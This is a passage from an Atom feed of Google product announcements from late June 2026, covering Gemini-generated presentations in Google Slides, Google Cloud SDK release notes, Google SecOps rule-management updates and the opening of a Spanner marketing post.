    <content type="html">&lt;p&gt;You can now create a full, multi-slide presentation using Gemini in Google Slides. With a single prompt, you can ground the presentation in existing content from Google Drive, match the style of another presentation, and build fully editable slides, allowing you to make any necessary adjustments. Gemini will also suggest relevant files, emails, and chats that you can choose to add to enrich your presentation.&lt;/p&gt;&lt;p&gt;Try the following to create more relevant, compelling presentations in less time:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Add a prompt: &lt;/b&gt;In the Slides side panel, add a prompt to generate a presentation.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Ground it in your content: &lt;/b&gt;Add as many reference files directly from Drive as you need to provide context.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Stay on-brand: &lt;/b&gt;Attach an existing deck to use as a style reference to ensure your presentation matches your desired look and feel.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Refine the plan for your presentation:&lt;/b&gt; Answer any follow-up questions to refine the presentation’s tone, style, content, or audience. You will also have the chance to edit or approve the presentation outline before the actual slides are created.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Note: &lt;/b&gt;At launch, this feature will be supported in English only.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLAnA2-yYCRrSYP7JkYLyEuN-1jwIoK0bmNLIqZUNCyIpxk82uWT-p68FH-UAs8PhkSmkPY7ev1Gzy59GuddRY4XZmn3nSFE8aseufHctaHTYxwCl8Wyjm5DVCt3x1FOaAmpXsar_08WYVM6mYp0SNtpp_JeH7K-6iu-r2Dmpn-euaqMUVMWWUrpmZVq8/s1253/Create%20fully%20native%20and%20editable%20presentations%20with%20Gemini%20in%20Google%20Slides%20-%206541%20-%203.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLAnA2-yYCRrSYP7JkYLyEuN-1jwIoK0bmNLIqZUNCyIpxk82uWT-p68FH-UAs8PhkSmkPY7ev1Gzy59GuddRY4XZmn3nSFE8aseufHctaHTYxwCl8Wyjm5DVCt3x1FOaAmpXsar_08WYVM6mYp0SNtpp_JeH7K-6iu-r2Dmpn-euaqMUVMWWUrpmZVq8/s1600/Create%20fully%20native%20and%20editable%20presentations%20with%20Gemini%20in%20Google%20Slides%20-%206541%20-%203.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/17111393" target="_blank"&gt;learn more about generating a presentation with Gemini&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;Note: Through at least August 1, 2026, Workspace customers will get promotional access to higher limits for creating multi-slide presentations using Gemini in Google Slides, allowing users to experiment with this feature. Users will see a notification when they use this feature to inform them of the limited higher promotional access period. Per-user usage limits will apply after that date; we’ll provide more information in the &lt;a href="https://support.google.com/a?p=limits" target="_blank"&gt;Help Center&lt;/a&gt; in advance of updated usage limits going into effect.&lt;/i&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) started on June 29, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons:&lt;/b&gt; Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;*Once promotional limits are no longer in effect, users with AI Expanded Access add-on licenses will have &lt;a href="https://support.google.com/a?p=limits" target="_blank"&gt;higher limits on usage&lt;/a&gt; of Gemini in Slides.&lt;/i&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Slides Help: &lt;a href="https://support.google.com/docs/answer/17111393" target="_blank"&gt;Generate presentations with Gemini in Google Slides&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Updates Blog: &lt;a href="https://workspace.google.com/blog/product-announcements/reimagining-content-creation" target="_blank"&gt;Reimagining content creation with Gemini in Google Docs, Sheets, Slides, and Drive&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/create-fully-native-and-editable-presentations-with-Gemini-in-Google-Slides.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-30T15:02:27+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-firmie/3-sposoby-na-madry-czas-przed-ekranem-i-aktywne-wakacje-dzieci</id>
    <title>3 sposoby na mądry czas przed ekranem i aktywne wakacje dzieci</title>
    <updated>2026-06-30T13:00:00+00:00</updated>
    <content type="html">Grafika przedstawiająca rodzine nad wspólnymi aktywnościami</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-firmie/3-sposoby-na-madry-czas-przed-ekranem-i-aktywne-wakacje-dzieci" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-30T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-06-30-FactSet-Announces-Strategic-Partnership-with-Google-Cloud-to-Bring-Advanced-AI-to-Financial-Intelligence</id>
    <title>FactSet Announces Strategic Partnership with Google Cloud to Bring Advanced AI to Financial Intelligence</title>
    <updated>2026-06-30T11:30:00+00:00</updated>
    <link href="https://googlecloudpresscorner.com/2026-06-30-FactSet-Announces-Strategic-Partnership-with-Google-Cloud-to-Bring-Advanced-AI-to-Financial-Intelligence" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-30T11:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/introducing-tabfm-a-zero-shot-foundation-model-for-tabular-data</id>
    <title>Introducing TabFM: A zero-shot foundation model for tabular data</title>
    <updated>2026-06-30T10:26:00+00:00</updated>
    <content type="html">Data Management</content>
    <link href="https://research.google/blog/introducing-tabfm-a-zero-shot-foundation-model-for-tabular-data" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-30T10:26:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_30_2026</id>
    <title>Cloud Release Notes — June 30, 2026</title>
    <updated>2026-06-30T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Cloud SDK&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h2 id="57500_2026-06-30"&gt;575.0.0 (2026-06-30)&lt;/h2&gt;
&lt;h3 id="google_cloud_cli"&gt;Google Cloud CLI&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;any-reservation-then-fail&lt;/code&gt; argument for flag &lt;code&gt;--reservation-affinity&lt;/code&gt;
in &lt;code&gt;gcloud container clusters node-pools create&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="agent_registry"&gt;Agent Registry&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;gcloud agent-registry&lt;/code&gt; command group to manage Agent Registry resources.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="alloydb"&gt;AlloyDB&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;--failover&lt;/code&gt; flag to &lt;code&gt;gcloud beta alloydb clusters promote&lt;/code&gt; to support cross-region failover.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="apigee"&gt;Apigee&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;gcloud apigee apis import&lt;/code&gt; which allows customers to upload API Proxy
bundles in archive ZIP or feature template YAML format.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="artifact_registry"&gt;Artifact Registry&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Expose the Registry URL in the output of &lt;code&gt;gcloud artifacts repositories describe&lt;/code&gt; and in the output of &lt;code&gt;gcloud artifacts repositories create&lt;/code&gt; (upon synchronous creation).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="assured_workloads"&gt;Assured Workloads&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;SWITZERLAND_DATA_BOUNDARY_WITH_ACCESS_JUSTIFICATIONS&lt;/code&gt; option to &lt;code&gt;--compliance-regime&lt;/code&gt; flag of &lt;code&gt;gcloud assured workloads create&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="biglake"&gt;BigLake&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;gcloud biglake hive tables create&lt;/code&gt; to beta.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_access_context_manager"&gt;Cloud Access Context Manager&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Exposed &lt;code&gt;--service-account&lt;/code&gt; and &lt;code&gt;--service-account-project-number&lt;/code&gt; for &lt;code&gt;gcloud access-context-manager cloud-bindings&lt;/code&gt; commands in the GA track.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_bigtable"&gt;Cloud Bigtable&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added support for &lt;code&gt;--tags&lt;/code&gt; flag to &lt;code&gt;gcloud bigtable instances create&lt;/code&gt; to allow binding tags on instance creation.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_data_lineage"&gt;Cloud Data Lineage&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;gcloud datalineage processes&lt;/code&gt; command group to manage data lineage processes.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_dataproc"&gt;Cloud Dataproc&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;--master-machine-types&lt;/code&gt; flag in &lt;code&gt;gcloud dataproc clusters create&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_iam"&gt;Cloud IAM&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Updated &lt;code&gt;gcloud iam service-accounts create&lt;/code&gt; to print the created service account's email address.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_run"&gt;Cloud Run&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Made the &lt;code&gt;FILE&lt;/code&gt; positional argument optional for all &lt;code&gt;gcloud run * replace&lt;/code&gt; commands, defaulting to their respective standard filenames if not specified.&lt;/li&gt;
&lt;li&gt;Promoted regional inference to beta for Cloud Run services, jobs, and worker
pools. When &lt;code&gt;--region&lt;/code&gt; or the &lt;code&gt;run/region&lt;/code&gt; property is not specified, the
command line looks for a resource with that name in all regions.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;--sandbox-launcher&lt;/code&gt; flag to &lt;code&gt;gcloud beta run deploy&lt;/code&gt; and
&lt;code&gt;gcloud beta run services update&lt;/code&gt; to allow setting a container as sandbox
launcher.&lt;/li&gt;
&lt;li&gt;Promoted &lt;code&gt;--workdir&lt;/code&gt; flag for &lt;code&gt;gcloud run&lt;/code&gt; commands to GA.&lt;/li&gt;
&lt;li&gt;Promoted interactive project prompt when project is not specified in &lt;code&gt;gcloud run deploy&lt;/code&gt; to GA.&lt;/li&gt;
&lt;li&gt;Promoted suggesting project and region from Artifact Registry URL in &lt;code&gt;gcloud run deploy&lt;/code&gt; to GA.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;--tail&lt;/code&gt; flag to &lt;code&gt;gcloud beta run jobs execute&lt;/code&gt; to tail logs
of the running execution.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;--dry-run&lt;/code&gt; flag to &lt;code&gt;gcloud beta run deploy&lt;/code&gt;,
&lt;code&gt;gcloud beta run services update&lt;/code&gt;, &lt;code&gt;gcloud beta run services delete&lt;/code&gt;,
&lt;code&gt;gcloud beta run worker-pools deploy&lt;/code&gt;, &lt;code&gt;gcloud beta run worker-pools update&lt;/code&gt;,
and &lt;code&gt;gcloud beta run worker-pools delete&lt;/code&gt; to validate configuration without
persisting changes.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud run jobs executions describe-latest&lt;/code&gt; command to describe the latest execution of a job.&lt;/li&gt;
&lt;li&gt;Call out proxy when deploying or updating services with &lt;code&gt;gcloud run deploy&lt;/code&gt; or &lt;code&gt;gcloud run services update&lt;/code&gt; that require authentication in all tracks.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_sql"&gt;Cloud SQL&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;--user&lt;/code&gt; and &lt;code&gt;--password-secret-version&lt;/code&gt; to &lt;code&gt;gcloud sql instances execute-sql&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_storage"&gt;Cloud Storage&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added download validation via MD5 hash and checksumming for streaming downloads in &lt;code&gt;gcloud storage cp&lt;/code&gt;, &lt;code&gt;gcloud storage mv&lt;/code&gt; and &lt;code&gt;gcloud storage cat&lt;/code&gt; commands, see &lt;a href="https://docs.cloud.google.com/storage/docs/streaming-downloads"&gt;https://docs.cloud.google.com/storage/docs/streaming-downloads&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Updated &lt;code&gt;gcloud storage cp&lt;/code&gt; command to support streaming uploads with objects in RAPID storage see &lt;a href="https://docs.cloud.google.com/storage/docs/streaming-uploads"&gt;https://docs.cloud.google.com/storage/docs/streaming-uploads&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Updated &lt;code&gt;gcloud storage cp&lt;/code&gt; and &lt;code&gt;gcloud storage mv&lt;/code&gt; commands to support streaming downloads with objects in RAPID storage see &lt;a href="https://docs.cloud.google.com/storage/docs/streaming-downloads"&gt;https://docs.cloud.google.com/storage/docs/streaming-downloads&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Updated &lt;code&gt;gcloud storage cat&lt;/code&gt; to support Rapid Bucket see &lt;a href="https://docs.cloud.google.com/storage/docs/rapid/rapid-bucket"&gt;https://docs.cloud.google.com/storage/docs/rapid/rapid-bucket&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_workstations"&gt;Cloud Workstations&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Promoted &lt;code&gt;--pd-disk-size&lt;/code&gt; flag of &lt;code&gt;gcloud workstations update&lt;/code&gt; to GA.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cluster_director"&gt;Cluster Director&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Users must supply a staticNodeCount if they want one. This no longer defaults
to 1.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="compute_engine"&gt;Compute Engine&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;gcloud alpha compute instance-groups managed configure-accelerator-topologies&lt;/code&gt; command to configure accelerator topologies of a managed instance group.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute instances set-machine-resources&lt;/code&gt; command to allow setting machine resources for a virtual machine instances in alpha, beta, and GA.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;test-iam-permissions&lt;/code&gt; command to &lt;code&gt;gcloud compute storage-pools&lt;/code&gt; to return permissions that a caller has on the specified storage pool.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute reservations sub-blocks set-iam-policy&lt;/code&gt; command to beta and GA release tracks.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute reservations blocks set-iam-policy&lt;/code&gt; command to set IAM policy on a reservation block in beta, preview, and GA.&lt;/li&gt;
&lt;li&gt;Promoted support for &lt;code&gt;gcloud compute instance-groups managed resize-requests create&lt;/code&gt; for regional MIG to GA.&lt;/li&gt;
&lt;li&gt;Promoted support for &lt;code&gt;gcloud compute instance-groups managed resize-requests cancel&lt;/code&gt; for regional MIG to GA.&lt;/li&gt;
&lt;li&gt;Promoted support for &lt;code&gt;gcloud compute instance-groups managed resize-requests delete&lt;/code&gt; for regional MIG to GA.&lt;/li&gt;
&lt;li&gt;Promoted support for &lt;code&gt;gcloud compute instance-groups managed resize-requests describe&lt;/code&gt; for regional MIG to GA.&lt;/li&gt;
&lt;li&gt;Promoted support for &lt;code&gt;gcloud compute instance-groups managed resize-requests list&lt;/code&gt; for regional MIG to GA.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute instance-templates test-iam-permissions&lt;/code&gt; command to test IAM permissions on an instance template in alpha, beta, GA, and preview.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute target-https-proxies set-quic-override&lt;/code&gt; command in beta, preview, and GA.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute reservations test-iam-permissions&lt;/code&gt; to test IAM permissions on Compute Engine reservations.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute network-attachments set-iam-policy&lt;/code&gt; command to set IAM policy on a network attachment in alpha, beta, preview, and GA.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute instances list-referrers&lt;/code&gt; command to alpha, beta, and GA
release tracks.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute reservations blocks test-iam-permissions&lt;/code&gt; command to test IAM permissions on a reservation block in beta.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;gcloud compute interconnects attachments groups test-iam-permissions&lt;/code&gt; command to test IAM permissions on an interconnect attachment group in beta, preview, and GA.&lt;/li&gt;
&lt;li&gt;Added support for displaying dynamic fields (such as &lt;code&gt;TERMINATION_TIMESTAMP&lt;/code&gt;) to &lt;code&gt;gcloud compute instance-groups managed list-instances&lt;/code&gt; in GA.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="database_migration"&gt;Database Migration&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;--source-database-name-override&lt;/code&gt; flag to
&lt;code&gt;gcloud database-migration conversion-workspaces seed|update&lt;/code&gt; to allow
overriding the database name for the seed operation.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="gke_hub"&gt;GKE Hub&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Promoted &lt;code&gt;gcloud container fleet rollouts&lt;/code&gt; to GA.&lt;/li&gt;
&lt;li&gt;Promoted &lt;code&gt;gcloud container fleet rolloutsequences&lt;/code&gt; to GA.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="kpt"&gt;Kpt&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Updated kpt to v1.0.0-beta.64. See &lt;a href="https://github.com/kptdev/kpt/releases/tag/v1.0.0-beta.64"&gt;https://github.com/kptdev/kpt/releases/tag/v1.0.0-beta.64&lt;/a&gt; for more details.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="kubernetes_engine"&gt;Kubernetes Engine&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Promoted GKE custom image flags (&lt;code&gt;--image&lt;/code&gt; and &lt;code&gt;--image-project&lt;/code&gt;)
to GA, making them publicly visible in
&lt;code&gt;gcloud container clusters create&lt;/code&gt;,
&lt;code&gt;gcloud container clusters create-auto&lt;/code&gt;, and
&lt;code&gt;gcloud container node-pools create&lt;/code&gt; (and &lt;code&gt;--image&lt;/code&gt;/&lt;code&gt;--image-project&lt;/code&gt;
in &lt;code&gt;gcloud container clusters upgrade&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;stack-type&lt;/code&gt; option to &lt;code&gt;--additional-node-network&lt;/code&gt; flag of
&lt;code&gt;gcloud container node-pools create&lt;/code&gt; to configure the stack type
(&lt;code&gt;ipv4&lt;/code&gt;, &lt;code&gt;ipv4-ipv6&lt;/code&gt;, or &lt;code&gt;ipv6&lt;/code&gt;) for additional network interfaces.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="network_management"&gt;Network Management&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;--source-cloud-run-job&lt;/code&gt; flag to &lt;code&gt;gcloud network-management connectivity-tests&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="network_services"&gt;Network Services&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Updated &lt;code&gt;gcloud edge-cache services&lt;/code&gt; import schemas to support specifying up to 100 allowed origins in &lt;code&gt;CORSPolicy.allowOrigins&lt;/code&gt; and a client TTL of &lt;code&gt;0s&lt;/code&gt; in &lt;code&gt;CDNPolicy.clientTtl&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Subscribe to these release notes at &lt;a href="https://groups.google.com/forum/#!forum/google-cloud-sdk-announce"&gt;https://groups.google.com/forum/#!forum/google-cloud-sdk-announce&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise Agent Platform&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Anthropic's Claude Sonnet 5&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/partner-models/claude/sonnet-5"&gt;Claude Sonnet 5&lt;/a&gt;
is available in Model Garden.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;[Spotlight Feature] Unified rules interface&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The new rules interface is now available in public preview. The Google SecOps unified rules interface brings custom and curated rule management into a single, cohesive workflow. This optimizes detection engineering with a redesigned dashboard, an advanced rule editor, and expanded API capabilities to streamline rule deployment and troubleshooting.&lt;/p&gt;
&lt;p&gt;You can still revert to the legacy experience. At the top right of the screen, click &lt;strong&gt;Switch to the legacy experience&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;For more information about the Unified rules interface, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/detection/unified-rules/manage-unified-rules"&gt;Manage unified rules&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SIEM&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Unified rules interface&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The new rules interface is now available in public preview.&lt;/p&gt;
&lt;p&gt;The Google SecOps unified rules interface brings custom and curated rule management into a single, cohesive workflow. This optimizes detection engineering with a redesigned dashboard, an advanced rule editor, and expanded API capabilities to streamline rule deployment and troubleshooting.&lt;/p&gt;
&lt;p&gt;You can still revert to the legacy experience. At the top right of the screen, click &lt;strong&gt;Switch to the legacy experience&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;For more information about the Unified rules interface, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/detection/unified-rules/manage-unified-rules"&gt;Manage unified rules&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Virtual Private Cloud&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;General Availability&lt;/strong&gt;: If a consumer VPC network uses an
&lt;a href="https://docs.cloud.google.com/vpc/docs/rdma-network-profiles#falcon-supported-features"&gt;RDMA network profile for Falcon VPC networks&lt;/a&gt;,
a single Compute Engine instance can connect to it by using multiple virtual
Private Service Connect interfaces.&lt;/p&gt;
&lt;p&gt;For more information, see
&lt;a href="https://docs.cloud.google.com/vpc/docs/create-manage-private-service-connect-interfaces#create"&gt;Create VMs with Private Service Connect interfaces&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_30_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-30T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/unlocking-britains-next-era-of-productivity-building-a-nation-of-ai-trailblazers</id>
    <title>Unlocking Britain’s next era of productivity: Building a nation of AI trailblazers</title>
    <updated>2026-06-30T06:00:00+00:00</updated>
    <content type="html">Four illustrated characters representing different professional roles, including a scientist, technician, explorer, and observer.</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/unlocking-britains-next-era-of-productivity-building-a-nation-of-ai-trailblazers" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-30T06:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://ai.google.dev/gemini-api/docs/changelog#06-30-2026</id>
    <title>Gemini API — 2026-06-30</title>
    <updated>2026-06-30T00:00:00+00:00</updated>
    <content type="text">Gemini Omni Flash w wersji testowej : udostępniony gemini-omni-flash-preview , wysokowydajny model multimodalny zaprojektowany do szybkiego generowania filmów i konwersacyjnej edycji filmów. Za pomocą interfejsu Interactions API możesz generować 3–10-sekundowe filmy w rozdzielczości 720p na podstawie opisów tekstowych lub animować obrazy statyczne, a następnie edytować i dopracowywać wyniki w formie rozmowy. Aby rozpocząć, zapoznaj się z przewodnikiem po Gemini Omni Flash i kartą modelu Gemini Omni Flash . Udostępniliśmy gemini-3.1-flash-lite-image (Nano Banana Lite) ogólnie dostępny wbudowan…</content>
    <link href="https://ai.google.dev/gemini-api/docs/changelog#06-30-2026" rel="alternate"/>
    <category term="Gemini API"/>
    <published>2026-06-30T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/databases/the-power-of-multi-model-spanner-for-the-agentic-era</id>
    <title>Supercharging the agentic era with Spanner’s multi-model architecture</title>
    <updated>2026-06-29T23:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the agentic era, the role of the database has fundamentally changed. It is no longer a passive repository; it’s a critical context engine designed to ground generative AI apps, models and power autonomous workflows. To do this effectively, databases must move beyond fragmented architectures and embrace a unified, multi-model foundation, facilitating deep reasoning and transforming static data into a system of action. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Spanner is leading this charge, and as a foundational pillar of Google’s &lt;/span&gt;&lt;a href="https://cloud.google.com/data-cloud?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Agentic Data Cloud&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the industry is taking notice. In the 2025 Gartner® Critical Capabilities for Operational Cloud &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/critical-capabilities-dbms?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Database Management Systems&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;report&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Google (Spanner) ranked &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;#1 in the Lightweight Transactions Use Case&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for the second consecutive year — in our opinion proving it is the most efficient engine for modern microservices and event-driven architectures.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Gartner® Operational Cloud DBMS use cases:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#1&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; in Lightweight Transactions&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4.9 / 5.0&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for Transactional Consistency&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4.6 / 5.0&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for AI/Machine Learning and GenAI&lt;/span&gt;&lt;/p&gt;
